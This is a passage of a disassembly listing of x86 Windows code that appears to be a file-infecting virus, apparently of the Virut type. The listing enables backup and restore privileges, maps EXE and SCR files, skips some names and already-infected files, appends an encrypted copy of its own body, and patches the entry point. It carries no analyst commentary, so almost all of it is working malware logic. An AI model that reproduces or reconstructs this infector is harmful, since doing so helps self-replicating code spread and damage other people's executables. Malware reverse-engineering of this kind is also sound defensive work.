[ebx+34h] push eax call sub_31442404 cmp [ebp+1042E4h], edi jnz short loc_314430C2 add eax, [ebp+1042E8h] add eax, [ebp+1042A4h] mov [ebp+104310h], eax mov eax, [eax] cmp eax, [ebp+104308h] jb short loc_3144306F cmp eax, [ebp+10430Ch] jb short loc_314430D8 loc_3144306F: ; CODE XREF: sub_3144309A-35j cmp eax, 70000000h jb short loc_314430AD call sub_3144309A lea ecx, [esi-4] mov eax, ecx sub eax, [edx] add eax, [edx+10h] cmp eax, [ebp+104310h] jnz short locret_31443099 add esp, 10h push dword ptr [ecx] pop [esp-0Ch+arg_24] popa jmp short loc_314430B4 ; --------------------------------------------------------------------------- locret_31443099: ; CODE XREF: sub_3144309A-Fj retn ; END OF FUNCTION CHUNK FOR sub_3144309A ; =============== S U B R O U T I N E ======================================= sub_3144309A proc near ; CODE XREF: sub_3144309A-24p var_8 = dword ptr -8 arg_0 = dword ptr 4 arg_24 = dword ptr 28h ; FUNCTION CHUNK AT 31442F7B SIZE 0000011F BYTES pop dword ptr [ebp+1042C4h] pusha mov esi, [ebp+1042A4h] call sub_3144250B popa loc_314430AD: ; CODE XREF: sub_3144309A-26j test eax, 80000000h jnz short loc_314430C2 loc_314430B4: ; CODE XREF: sub_3144309A-3j sub eax, [edi+0Ch] jb short loc_314430C2 cmp eax, [edi+8] jb loc_31442FFE loc_314430C2: ; CODE XREF: sub_3144309A-F9j ; sub_3144309A-EBj ... dec ecx jnz loc_31442F7B loc_314430C9: ; CODE XREF: sub_31442EE1+9j ; UPX2:31442F63j ... mov edi, [esp-4+arg_0] and dword ptr [edi+29B0h], 0FFBFFFFFh jmp short loc_3144311A ; --------------------------------------------------------------------------- loc_314430D8: ; CODE XREF: sub_3144309A-7Fj ; sub_3144309A-2Dj or dword ptr [edx+24h], 0E0000060h dec esi xor eax, eax mov ecx, [esp+8+var_8] xchg eax, [ebp+1042F0h] mov [ebp+1042ECh], eax lea edi, [ecx+29B4h] add eax, [ebp+1042A4h] movsw movsd dec esi sub eax, esi add eax, [edx+14h] sub eax, [edx+0Ch] mov byte ptr [esi-5], 0E8h mov dword ptr [ecx+54h], 5 mov [esi-4], eax loc_3144311A: ; CODE XREF: sub_3144309A+3Cj pop edi pop esi retn sub_3144309A endp ; sp-analysis failed ; =============== S U B R O U T I N E ======================================= sub_3144311D proc near ; CODE XREF: UPX2:3144341Ep ; FUNCTION CHUNK AT 31443247 SIZE 00000002 BYTES push edi call dword ptr [ebp+103EAAh] shr eax, 1Fh jnz loc_31443247 push eax push esp push 28h push 0FFFFFFFFh call dword ptr [ebp+103F0Ah] test eax, eax pop edi js loc_31443247 call sub_3144159F call near ptr loc_31443158+5 push ebx db 65h jz short near ptr unk_31443196 imul ebp, [ebp+53h], 72756365h loc_31443158: ; CODE XREF: sub_3144311D+2Ap imul esi, [ecx+edi*2+41h], 78B5FF00h sub_3144311D endp ; sp-analysis failed inc edx adc [eax], al call dword ptr [ebp+103E5Eh] mov [ebp+104280h], eax call near ptr loc_3144318C+1 push ebx db 65h push esp popa imul esp, [ebp+4Fh], 77h outsb db 65h jb short loc_314431F3 push 72507069h imul esi, [esi+69h], 6567656Ch loc_3144318C: ; CODE XREF: UPX2:3144316Fp add [edi-18h], dl sub eax, ebp ; --------------------------------------------------------------------------- db 0FFh db 0FFh db 0E8h ; db 13h db 0 unk_31443196 db 0 ; CODE XREF: sub_3144311D+30j db 0 db 53h ; S db 65h ; e db 52h ; R db 65h ; e db 73h ; s db 74h ; t db 6Fh ; o db 72h ; r db 65h ; e db 50h ; P db 72h ; r db 69h ; i db 76h ; v db 69h ; i db 6Ch ; l db 65h ; e db 67h ; g db 65h ; e db 0 db 57h ; W db 0E8h ; db 0Bh db 0E8h ; db 0FFh db 0FFh db 0E8h ; db 12h db 0 db 0 db 0 db 53h ; S db 65h ; e db 42h ; B db 61h ; a db 63h ; c db 6Bh ; k db 75h ; u db 70h ; p db 50h ; P db 72h ; r db 69h ; i db 76h ; v db 69h ; i db 6Ch ; l db 65h ; e db 67h ; g db 65h ; e db 0 db 57h ; W db 0E8h ; db 0EEh ; db 0E7h ; db 0FFh db 0FFh db 0E8h ; db 18h db 0 db 0 db 0 db 53h ; S db 65h ; e db 43h ; C db 68h ; h db 61h ; a db 6Eh ; n db 67h ; g db 65h ; e db 4Eh ; N db 6Fh ; o db 74h ; t db 69h ; i db 66h ; f db 79h ; y db 50h ; P db 72h ; r db 69h ; i db 76h ; v db 69h ; i db 6Ch ; l db 65h ; e db 67h ; g db 65h ; e db 0 db 57h ; W db 0E8h ; db 0CBh ; db 0E7h ; db 0FFh db 0FFh db 50h ; P db 54h ; T ; --------------------------------------------------------------------------- loc_314431F3: ; CODE XREF: UPX2:3144317Dj lea eax, [ebp+103DBCh] push 64h push eax push 1 push edi call dword ptr [ebp+103F16h] mov [esp], edi call dword ptr [ebp+103E52h] sub al, al lea edi, [ebp+104174h] push eax push eax push eax push dword ptr [ebp+103DBCh] push 40001h push esp push 1 push edi call dword ptr [ebp+104280h] push esp push 4 push edi call dword ptr [ebp+104280h] add esp, 14h push dword ptr [ebp+104278h] call dword ptr [ebp+103E8Eh] ; START OF FUNCTION CHUNK FOR sub_3144311D loc_31443247: ; CODE XREF: sub_3144311D+Aj ; sub_3144311D+1Fj pop edi retn ; END OF FUNCTION CHUNK FOR sub_3144311D ; =============== S U B R O U T I N E ======================================= sub_31443249 proc near ; CODE XREF: UPX2:31443417p ; UPX2:31443423p ... lea esi, [ebp+104174h] push esi call dword ptr [ebp+103E92h] cmp eax, 0FFFFFFFFh jz locret_3144331A mov [ebp+104284h], eax push 0 push esi call dword ptr [ebp+103ECEh] test eax, eax jz locret_3144331A sub eax, eax push eax push eax push 3 push eax push 1 push 0C0000000h push esi call dword ptr [ebp+103E6Eh] cmp eax, 0FFFFFFFFh jz loc_3144389B mov [ebp+104288h], eax lea ecx, [ebp+10428Ch] lea edx, [ebp+104294h] push ecx push edx push 0 push eax call dword ptr [ebp+103E9Ah] cmp eax, 0FFFFFFFFh jz loc_3144388F push 0 push dword ptr [ebp+104288h] call dword ptr [ebp+103E96h] cmp eax, 0FFFFFFFFh jz loc_3144388F mov [ebp+10429Ch], eax xor ecx, ecx add eax, ebx push ecx push eax push ecx push 4 push ecx push dword ptr [ebp+104288h] call dword ptr [ebp+103E72h] test eax, eax jz loc_3144388F xor ecx, ecx mov [ebp+1042A0h], eax push ecx push ecx push ecx push 0F001Fh push eax call dword ptr [ebp+103EBAh] test eax, eax jz loc_31443867 mov [ebp+1042A4h], eax locret_3144331A: ; CODE XREF: sub_31443249+10j ; sub_31443249+27j ... retn sub_31443249 endp ; --------------------------------------------------------------------------- loc_3144331B: ; CODE XREF: sub_3144344B+188p ; sub_3144344B+2A0p mov eax, 7317h mov ecx, [ebx+38h] ; --------------------------------------------------------------------------- db 0F7h ; db 85h ; db 0B0h ; db 39h ; 9 db 10h db 0 db 0 db 0 db 0 ; --------------------------------------------------------------------------- and [ebp+6], dh add eax, [ebp+101069h] xor edx, edx add eax, ecx div ecx mul ecx mov [ebp+1042B0h], eax mov eax, 29BBh mov ecx, [ebx+3Ch] add eax, [ebp+101069h] xor edx, edx add eax, ecx div ecx mul ecx mov [ebp+1042A8h], eax retn ; =============== S U B R O U T I N E ======================================= sub_31443360 proc near ; CODE XREF: sub_3144344B:loc_314434C0p ; sub_3144344B+1B4p movzx ecx, word ptr [ebx+6] stc loc_31443365: ; CODE XREF: sub_31443360+23j jecxz short locret_3144339C lea edx, [ebx+18h] movzx eax, word ptr [ebx+14h] add edx, eax dec ecx imul eax, ecx, 28h add edx, eax cmp dword ptr [edx], 6E69775Fh stc jz short locret_3144339C cmp dword ptr [edx+0Ch], 1 jb short loc_31443365 mov ecx, [ebx+3Ch] mov eax, [edx+14h] add eax, [edx+10h] lea eax, [eax+ecx*2-1] neg ecx and eax, ecx cmp eax, [ebp+10429Ch] locret_3144339C: ; CODE XREF: sub_31443360:loc_31443365j ; sub_31443360+1Dj ... retn sub_31443360 endp ; =============== S U B R O U T I N E ======================================= sub_3144339D proc near ; CODE XREF: UPX2:31443435p arg_C = dword ptr 10h mov edx, [esp+arg_C] xor eax, eax pop dword ptr [edx+0B8h] retn sub_3144339D endp ; sp-analysis failed ; --------------------------------------------------------------------------- loc_314433AA: ; CODE XREF: UPX2:314433CBj mov ecx, edi jmp short loc_314433B9 ; --------------------------------------------------------------------------- lea edi, [ebp+104174h] cld loc_314433B5: ; CODE XREF: UPX2:314433C7j mov ebx, edi xor ecx, ecx loc_314433B9: ; CODE XREF: UPX2:314433ACj ; UPX2:314433CFj lodsb cmp al, 61h jb short loc_314433C4 cmp al, 7Ah ja short loc_314433C4 sub al, 20h loc_314433C4: ; CODE XREF: UPX2:314433BCj ; UPX2:314433C0j stosb cmp al, 5Ch jz short loc_314433B5 cmp al, 2Eh jz short loc_314433AA cmp al, 0 jnz short loc_314433B9 jecxz short locret_3144339C mov eax, [ecx] cmp eax, 455845h jz short loc_314433E7 cmp eax, 524353h jnz locret_3144331A loc_314433E7: ; CODE XREF: UPX2:314433DAj mov eax, [ebx] cmp eax, 434E4957h jz locret_3144331A cmp eax, 4E554357h jz locret_3144331A cmp eax, 32334357h jz locret_3144331A cmp eax, 4F545350h jz locret_3144331A xor ebx, ebx call sub_31443249 jnz short loc_3144342E call sub_3144311D call sub_31443249 jz locret_3144331A loc_3144342E: ; CODE XREF: UPX2:3144341Cj xor edx, edx call sub_3144344B call sub_3144339D call $+5 pop ebp sub ebp, 10343Fh jmp loc_31443845 ; =============== S U B R O U T I N E ======================================= sub_3144344B proc near ; CODE XREF: UPX2:31443430p var_14 = dword ptr -14h push dword ptr fs:[edx] mov esi, [ebp+1042A4h] mov fs:[edx], esp cmp word ptr [esi], 5A4Dh jnz loc_31443845 mov ebx, [esi+3Ch] add ebx, esi cmp word ptr [ebx], 4550h jnz loc_31443845 test dword ptr [ebx+16h], 2000h jnz loc_31443845 test byte ptr [ebx+5Ch], 2 jz loc_31443845 mov eax, [ebx+8] cmp eax, 0A0A0A0A0h jz loc_31443845 cmp eax, 20202020h jz loc_31443845 mov ecx, [ebx+0C8h] jecxz short loc_314434C0 push ecx call sub_31442404 add ecx, [ebp+1042E8h] add ecx, esi and dword ptr [ecx+40h], 0 and dword ptr [ecx+44h], 0 loc_314434C0: ; CODE XREF: sub_3144344B+5Dj call sub_31443360 jb loc_31443845 and dword ptr [ebp+1042ECh], 0 mov eax, [edx+8] mov ecx, [edx+10h] sub eax, ecx jnb short loc_314434E0 xor eax, eax jmp short loc_314434E5 ; --------------------------------------------------------------------------- loc_314434E0: ; CODE XREF: sub_3144344B+8Fj add ecx, eax mov [edx+10h], ecx loc_314434E5: ; CODE XREF: sub_3144344B+93j mov [ebp+1042ACh], eax add ecx, [edx+0Ch] mov eax, 10000h push ecx call near ptr dword_31441B40+43h xor [ebp+1039AEh], dl mov cl, 20h xor [ebp+1039AFh], dh loc_31443507: ; CODE XREF: sub_3144344B+D5j push 20h dec cl pop eax js short loc_31443522 call near ptr dword_31441B40+43h test edx, edx setz dl shl edx, cl xor [ebp+1039B0h], edx jmp short loc_31443507 ; --------------------------------------------------------------------------- loc_31443522: ; CODE XREF: sub_3144344B+C1j test dword ptr [ebp+1039B0h], 2000000h jz short loc_31443550 test dword ptr [ebp+1039B0h], 3 jnz short loc_31443546 and dword ptr [ebp+1039B0h], 0F7FFFFFFh jmp short loc_31443550 ; --------------------------------------------------------------------------- loc_31443546: ; CODE XREF: sub_3144344B+EDj or dword ptr [ebp+1039B0h], 10000000h loc_31443550: ; CODE XREF: sub_3144344B+E1j ; sub_3144344B+F9j ... push 6 pop ecx loc_31443556: ; CODE XREF: sub_3144344B+129j push 6 pop eax call near ptr dword_31441B40+43h mov al, [ebp+1039A8h] xchg al, [edx+ebp+1039A8h] mov [ebp+1039A8h], al loop loc_31443556 test dword ptr [ebp+1039B0h], 8 jnz short loc_3144358B cmp byte ptr [ebp+1039AAh], 1 jz short loc_31443550 loc_3144358B: ; CODE XREF: sub_3144344B+135j test dword ptr [ebp+1039B0h], 10000000h jz short loc_314435B2 cmp byte ptr [ebp+1039A8h], 5 jz short loc_31443550 cmp byte ptr [ebp+1039A9h], 5 jz short loc_31443550 cmp byte ptr [ebp+1039AAh], 5 jz short loc_31443550 loc_314435B2: ; CODE XREF: sub_3144344B+14Aj test dword ptr [ebp+1039B0h], 400000h jz short loc_314435C7 cmp byte ptr [ebp+1039A8h], 2 ja short loc_31443550 loc_314435C7: ; CODE XREF: sub_3144344B+171j and dword ptr [ebp+1042F0h], 0 call loc_31442845 call loc_3144331B call sub_3144384E mov ebx, [ebp+1042A8h] add ebx, [ebp+1042ACh] call sub_31443249 jz loc_31443845 mov esi, [ebp+1042A4h] mov ebx, [esi+3Ch] add ebx, esi call sub_31443360 jb loc_31443845 or dword ptr [edx+24h], 0E0000060h mov edi, esi push edx push esi add edi, [edx+14h] add edi, [edx+10h] test dword ptr [ebp+1039B0h], 20000000h jnz short loc_3144363B mov [ebp+1042F4h], edi lea esi, [ebp+1039BCh] mov ecx, [ebp+101069h] rep movsb loc_3144363B: ; CODE XREF: sub_3144344B+1DAj push edi mov ecx, 0A6Fh lea esi, [ebp+101000h] rep movsd mov cl, 0 jecxz short loc_3144364F rep movsb loc_3144364F: ; CODE XREF: sub_3144344B+200j test dword ptr [ebp+1039B0h], 20000000h jz loc_3144370D push dword ptr [ebx+28h] call sub_31442404 mov edx, [ebp+1042E4h] test edx, edx jz loc_3144370D mov esi, [ebp+1042A4h] mov ecx, [edx+10h] or dword ptr [edx+24h], 0E0000060h sub ecx, [edx+8] jnb short loc_3144368C xor ecx, ecx loc_3144368C: ; CODE XREF: sub_3144344B+23Dj add esi, [edx+14h] cmp ecx, [ebp+101069h] mov ecx, [ebp+101069h] jb short loc_314436F3 mov edi, [esp+14h+var_14] and dword ptr [ebp+101069h], 0 and dword ptr [edi+69h], 0 mov edi, [edx+8] add [edx+8], ecx add esi, edi xchg esi, edi mov eax, [ebp+1042B8h] test dword ptr [ebp+1039B0h], 40h jz short loc_314436CC neg dword ptr [eax] loc_314436CC: ; CODE XREF: sub_3144344B+27Dj add esi, [edx+0Ch] sub [eax], esi mov [ebp+1042F0h], esi mov esi, [ebx+28h] add [eax], esi test dword ptr [ebp+1039B0h], 40h jz short loc_314436EA neg dword ptr [eax] loc_314436EA: ; CODE XREF: sub_3144344B+29Bj push ecx call loc_3144331B pop ecx jmp short loc_314436FF ; --------------------------------------------------------------------------- loc_314436F3: ; CODE XREF: sub_3144344B+250j add esi, [ebx+28h] sub esi, [edx+0Ch] push ecx push esi rep movsb pop edi pop ecx loc_314436FF: ; CODE XREF: sub_3144344B+2A6j lea esi, [ebp+1039BCh] mov [ebp+1042F4h], edi rep movsb loc_3144370D: ; CODE XREF: sub_3144344B+20Ej ; sub_3144344B+224j pop edi pop esi rdtsc xchg eax, edx lea eax, [edi+137h] cmp dl, [ebp+1039AEh] jnz short loc_31443726 imul edx, 12345678h loc_31443726: ; CODE XREF: sub_3144344B+2D3j mov [eax-19h], dx call near ptr locret_3144111E+2 pop edx mov ecx, [edx+0Ch] add ecx, [edx+10h] test dword ptr [ebp+1039B0h], 20000000h lea eax, [ecx+5] jnz short loc_31443758 mov [ebp+1042F0h], ecx add eax, [ebp+101069h] and dword ptr [edi+69h], 0 loc_31443758: ; CODE XREF: sub_3144344B+2F8j sub eax, [ebx+28h] mov [edi+54h], eax test dword ptr [ebp+103F6Ch], 1 jz short loc_31443774 mov dword ptr [ebx+8], 0A0A0A0A0h loc_31443774: ; CODE XREF: sub_3144344B+320j test dword ptr [ebp+1039B0h], 400000h jz short loc_31443787 push edx call sub_31442EE1 pop edx loc_31443787: ; CODE XREF: sub_3144344B+333j mov ecx, [ebp+1042F0h] jecxz short loc_31443794 mov [ebx+28h], ecx jmp short loc_314437A1 ; --------------------------------------------------------------------------- loc_31443794: ; CODE XREF: sub_3144344B+342j mov ecx, [ebp+1042ECh] jecxz short loc_3144379E jmp short loc_314437A1 ; --------------------------------------------------------------------------- loc_3144379E: ; CODE XREF: sub_3144344B+34Fj mov ecx, [ebx+28h] loc_314437A1: ; CODE XREF: sub_3144344B+347j ; sub_3144344B+351j test dword ptr [ebp+1039B0h], 3 jz short loc_314437C1 mov eax, [ebp+1042F4h] add ecx, [ebp+1042DCh] add eax, [ebp+1042D8h] add [eax], ecx loc_314437C1: ; CODE XREF: sub_3144344B+360j mov ecx, [edx+10h] mov eax, [ebp+1042A8h] cmp [edx+8], ecx jnb short loc_314437D2 mov [edx+8], ecx loc_314437D2: ; CODE XREF: sub_3144344B+382j add [edx+10h], eax and dword ptr [ebx+58h], 0 mov eax, [ebp+1042B0h] push 29BCh add [edx+8], eax pop ecx add [ebx+50h], eax mov dl, [ebp+1039AEh] test dword ptr [ebp+1039B0h], 20000000h jz short loc_31443803 add ecx, [ebp+101069h] loc_31443803: ; CODE XREF: sub_3144344B+3B0j mov dh, 0 test dword ptr [ebp+1039B0h], 20000h jnz short loc_31443825 inc dh test dword ptr [ebp+1039B0h], 40000h jnz short loc_31443825 mov dh, [ebp+1039AFh] loc_31443825: ; CODE XREF: sub_3144344B+3C4j ; sub_3144344B+3D2j test dword ptr [ebp+1039B0h], 4000h jnz short loc_3144383C loc_31443831: ; CODE XREF: sub_3144344B+3EDj mov al, [edi] add al, dl stosb add dl, dh loop loc_31443831 jmp short loc_31443845 ; --------------------------------------------------------------------------- loc_3144383C: ; CODE XREF: sub_3144344B+3E4j ; sub_3144344B+3F8j mov al, [edi] xor al, dl stosb add dl, dh loop loc_3144383C loc_31443845: ; CODE XREF: UPX2:31443446j ; sub_3144344B+11j ... xor edx, edx mov esp, fs:[edx] pop dword ptr fs:[edx] pop eax sub_3144344B endp ; sp-analysis failed ; =============== S U B R O U T I N E ======================================= sub_3144384E proc near ; CODE XREF: sub_3144344B+18Dp cmp dword ptr [ebp+104288h], 0 jz locret_3144331A push dword ptr [ebp+1042A4h] call dword ptr [ebp+103EDEh] loc_31443867: ; CODE XREF: sub_31443249+C5j push dword ptr [ebp+1042A0h] call dword ptr [ebp+103E52h] lea ecx, [ebp+10428Ch] lea edx, [ebp+104294h] push ecx push edx push 0 push dword ptr [ebp+104288h] call dword ptr [ebp+103ED2h] loc_3144388F: ; CODE XREF: sub_31443249+6Bj ; sub_31443249+82j ... push dword ptr [ebp+104288h] call dword ptr [ebp+103E52h] loc_3144389B: ; CODE XREF: sub_31443249+45j lea esi, [ebp+104174h] push dword ptr [ebp+104284h] push esi call dword ptr [ebp+103ECEh] and dword ptr [ebp+104288h], 0 retn sub_3144384E endp ; --------------------------------------------------------------------------- dw 0E8h dd 5D000000h, 0ED81016Ah, 1038BBh, 0C10FF058h, 10157885h dd 0C3C08500h, 0F0FFC883h, 7885C10Fh, 0C3001015h, 2A00103Dh dd 661C7500h, 0C247C81h, 1375716Ch, 0FFC4E860h, 575FFFFh dd 0FFFAB5E8h, 0FFD2E8FFh, 2E61FFFFh, 56782DFFh, 25B81234h dd 60000000h, 0FFFFA5E8h, 8B3975FFh, 8D302444h, 104174B5h dd 8508B00h, 63A8166h, 56257302h, 0FF000068h, 6AC48B00h dd 0FF505200h, 103F1E95h, 8C48300h, 3F5C3E81h, 3755C3Fh dd 0E804C683h, 0FFFFFA62h, 0FFFF7FE8h, 0B8C361FFh, 74h dd 2FB8B1EBh, 0E8000000h, 1Dh, 0B80020C2h, 30h, 10E8h dd 24C200h, 185B8h, 3E800h, 2CC20000h, 24548D00h, 832ECD0Ch dd 197C00F8h, 0E860h, 548B0000h, 8B5D3024h, 92ED811Ah dd 0E8001039h, 0FFFFE0B3h, 4C261h, 2070103h, 12D00506h dd 7BB9C4FBh, 119415FFh, 0FF8B0100h ; --------------------------------------------------------------------------- cld push ebp mov ebp, esp call sub_314439D7 stc call sub_31443A81 stc stc mov ebp, 0 jmp loc_31443A1D ; =============== S U B R O U T I N E ======================================= sub_314439D7 proc near ; CODE XREF: UPX2:314439C0p push dword ptr fs:0 xor dword ptr ds:loc_31428210+2, ebp nop xchg ebx, ebx mov fs:0, esp xor ecx, ecx push ecx push ecx push ecx push ecx push ecx push ecx push 8 push ecx call ds:dword_31428090 ; GetProcAddress xor ecx, ecx push 40h push ecx push ecx push ecx push 10000h push ecx push 80000000h push ecx push ecx call ds:dword_31428090 ; GetProcAddress loc_31443A1D: ; CODE XREF: UPX2:314439D2j stc mov edi, [ebp-8] mov fs:0, edi stc jmp short $+2 call sub_31443A79 clc sub ebx, 0FFFEF273h xor ecx, ecx or ecx, 2A91h cld cmc and edi, 0 add edi, 0CDh xchg ebx, ebx push ebx jmp short $+2 loc_31443A4E: ; CODE XREF: sub_314439D7+93j mov al, [ebx] mov ebx, ebx xor ax, di mov [ebx], al cmc mov ebx, ebx add ebx, 1 add di, 0FBh dec ecx stc xchg ebx, ebx jmp short $+2 or ecx, ecx jnz short loc_31443A4E pop ebx clc nop clc mov ecx, ecx leave nop jmp ebx sub_314439D7 endp ; --------------------------------------------------------------------------- db 90h db 87h, 0DBh ; =============== S U B R O U T I N E ======================================= sub_31443A79 proc near ; CODE XREF: sub_314439D7+53p pop ebx xchg ebx, ebx push ebx retn sub_31443A79 endp ; --------------------------------------------------------------------------- align 10h stc ; =============== S U B R O U T I N E ======================================= sub_31443A81 proc near ; CODE XREF: UPX2:314439C6p arg_C = dword ptr 10h mov ecx, [esp+arg_C] xor eax, eax pop dword ptr [ecx+0B8h] retn sub_31443A81 endp ; sp-analysis failed ; --------------------------------------------------------------------------- dw 89F5h dd 0D2h, 0F590C3h, 53800000h, 535353h, 0E0h dup(0) aBasenamedobjec: unicode 0, <\BaseNamedObjects\VtSect>,0 dw 9B47h dd 8AD7C80h, 3317C83h, 0ADA07C91h, 7C80h, 0 dd 0BDB60000h, 1A247C80h, 945C7C80h, 23677C80h, 42C7C80h dd 6377C81h, 4B0F7C81h, 0C0587C86h, 0E7EC7C80h, 0ABDE7C80h dd 153C7C80h, 0A777C81h, 1C457C81h, 0B6A17C83h, 8FF7C80h dd 5DCA7C86h, 11DA7C83h, 2ADE7C81h, 1BA57C81h, 1D777C82h dd 0B9057C80h, 0BB767C80h, 9E17C80h, 3DE57C83h, 3F587C86h dd 27827C86h, 1CB87C81h, 24427C83h, 0B1C7C80h, 0B9747C81h dd 9A517C80h, 0D877C80h, 0D4607C81h, 0D6827C90h, 0D7547C90h dd 0D7697C90h, 0D7937C90h, 7C90h, 0DC550000h, 0DCFD7C90h dd 0DD907C90h, 0DDBA7C90h, 0DEB67C90h, 0E0457C90h, 0EA327C90h dd 30C67C90h, 7C91h, 14h dup(0) dd 320030h, 31443F7Ch, 42005Ch, 730061h, 4E0065h, 6D0061h dd 640065h, 62004Fh, 65006Ah, 740063h, 5C0073h, 740056h dd 650053h, 740063h, 0D3h dup(0) dd offset loc_31441000 dd 1341h dup(0) UPX2 ends ; Section 4. (virtual address 00029000) ; Virtual size : 00001000 ( 4096.) ; Section size in file : 00000200 ( 512.) ; Offset to raw data for section: 00029000 ; Flags C0000040: Data Readable Writable ; Alignment : default ; =========================================================================== ; Segment type: Pure data ; Segment permissions: Read/Write _idata2 segment para public 'DATA' use32 assume cs:_idata2 ;org 31449000h align 2000h _idata2 ends end start